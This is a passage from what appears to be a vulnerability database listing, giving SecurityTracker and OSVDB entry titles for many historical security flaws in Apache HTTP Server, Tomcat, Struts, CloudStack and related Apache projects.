5760| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
5761| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
5762| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
5763| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
5764| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
5765| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
5766| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
5767| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
5768| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
5769| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
5770| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
5771| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
5772| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
5773| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
5774| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
5775| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
5776| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
5777| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
5778| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
5779| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
5780| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
5781| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
5782| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
5783| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
5784| [1008920] Apache mod_digest May Validate Replayed Client Responses
5785| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
5786| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
5787| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
5788| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
5789| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
5790| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
5791| [1008030] Apache mod_rewrite Contains a Buffer Overflow
5792| [1008029] Apache mod_alias Contains a Buffer Overflow
5793| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
5794| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
5795| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
5796| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
5797| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
5798| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
5799| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
5800| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
5801| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
5802| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
5803| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
5804| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
5805| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
5806| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
5807| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
5808| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
5809| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
5810| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
5811| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
5812| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
5813| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
5814| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
5815| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
5816| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
5817| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
5818| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
5819| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
5820| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
5821| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
5822| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
5823| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
5824| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
5825| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
5826| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
5827| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
5828| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
5829| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
5830| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
5831| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
5832| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
5833| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
5834| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
5835| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
5836| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
5837| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
5838| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
5839| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
5840| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
5841| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
5842| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
5843| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
5844| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
5845| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
5846| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
5847| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
5848| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
5849|
5850| OSVDB - http://www.osvdb.org:
5851| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
5852| [96077] Apache CloudStack Global Settings Multiple Field XSS
5853| [96076] Apache CloudStack Instances Menu Display Name Field XSS
5854| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
5855| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
5856| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
5857| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
5858| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
5859| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
5860| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
5861| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
5862| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
5863| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
5864| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
5865| [95599] Apache Continuum web/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
5866| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
5867| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
5868| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
5869| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
5870| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
5871| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
5872| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
5873| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
5874| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
5875| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
5876| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
5877| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
5878| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
5879| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
5880| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
5881| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
5882| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
5883| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
5884| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
5885| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
5886| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
5887| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
5888| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
5889| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
5890| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
5891| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
5892| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
5893| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
5894| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
5895| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
5896| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
5897| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
5898| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
5899| [94279] Apache Qpid CA Certificate Validation Bypass
5900| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
5901| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
5902| [94042] Apache Axis JAX-WS Java Unspecified Exposure
5903| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
5904| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
5905| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
5906| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
5907| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
5908| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
5909| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
5910| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
5911| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
5912| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
5913| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
5914| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
5915| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
5916| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
5917| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
5918| [93541] Apache Solr json.wrf Callback XSS
5919| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
5920| [93521] Apache jUDDI Security API Token Session Persistence Weakness
5921| [93520] Apache CloudStack Default SSL Key Weakness
5922| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
5923| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
5924| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
5925| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
5926| [93515] Apache HBase table.jsp name Parameter XSS
5927| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
5928| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
5929| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
5930| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
5931| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
5932| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
5933| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
5934| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
5935| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
5936| [93252] Apache Tomcat FORM Authenticator Session Fixation
5937| [93172] Apache Camel camel/endpoints/ Endpoint XSS
5938| [93171] Apache Sling HtmlResponse Error Message XSS
5939| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
5940| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
5941| [93168] Apache Click ErrorReport.java id Parameter XSS
5942| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
5943| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
5944| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
5945| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
5946| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
5947| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
5948| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
5949| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
5950| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
5951| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
5952| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
5953| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
5954| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
5955| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
5956| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
5957| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
5958| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
5959| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
5960| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
5961| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
5962| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
5963| [93144] Apache Solr Admin Command Execution CSRF
5964| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
5965| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
5966| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
5967| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
5968| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
5969| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
5970| [92748] Apache CloudStack VM Console Access Restriction Bypass
5971| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
5972| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
5973| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
5974| [92706] Apache ActiveMQ Debug Log Rendering XSS
5975| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
5976| [92270] Apache Tomcat Unspecified CSRF
5977| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
5978| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
5979| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
5980| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
5981| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
5982| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
5983| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
5984| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
5985| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
5986| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
5987| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
5988| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
5989| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
5990| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
5991| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
5992| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
5993| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
5994| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
5995| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
5996| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
5997| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
5998| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
5999| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
6000| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
6001| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
6002| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
6003| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
6004| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
6005| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
6006| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
6007| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
6008| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
6009| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
6010| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
6011| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
6012| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
6013| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
6014| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
6015| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
6016| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
6017| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
6018| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
6019| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
6020| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
6021| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
6022| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
6023| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
6024| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
6025| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
6026| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
6027| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
6028| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
6029| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
6030| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
6031| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
6032| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
6033| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
6034| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
6035| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
6036| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
6037| [86901] Apache Tomcat Error Message Path Disclosure
6038| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
6039| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
6040| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
6041| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
6042| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
6043| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
6044| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
6045| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
6046| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
6047| [85430] Apache mod_pagespeed Module Unspecified XSS
6048| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
6049| [85249] Apache Wicket Unspecified XSS
6050| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
6051| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
6052| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
6053| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
6054| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
6055| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
6056| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
6057| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
6058| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
6059| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
6060| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
6061| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
6062| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
6063| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
6064| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
6065| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
6066| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
6067| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
6068| [83339] Apache Roller Blogger Roll Unspecified XSS
6069| [83270] Apache Roller Unspecified Admin Action CSRF
6070| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
6071| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
6072| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
6073| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
6074| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
6075| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
6076| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
6077| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
6078| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
6079| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
6080| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
6081| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
6082| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
6083| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
6084| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
6085| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
6086| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
6087| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
6088| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
6089| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
6090| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
6091| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
| [80300] Apache Wicket wicket:pageMapName Parameter XSS
| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
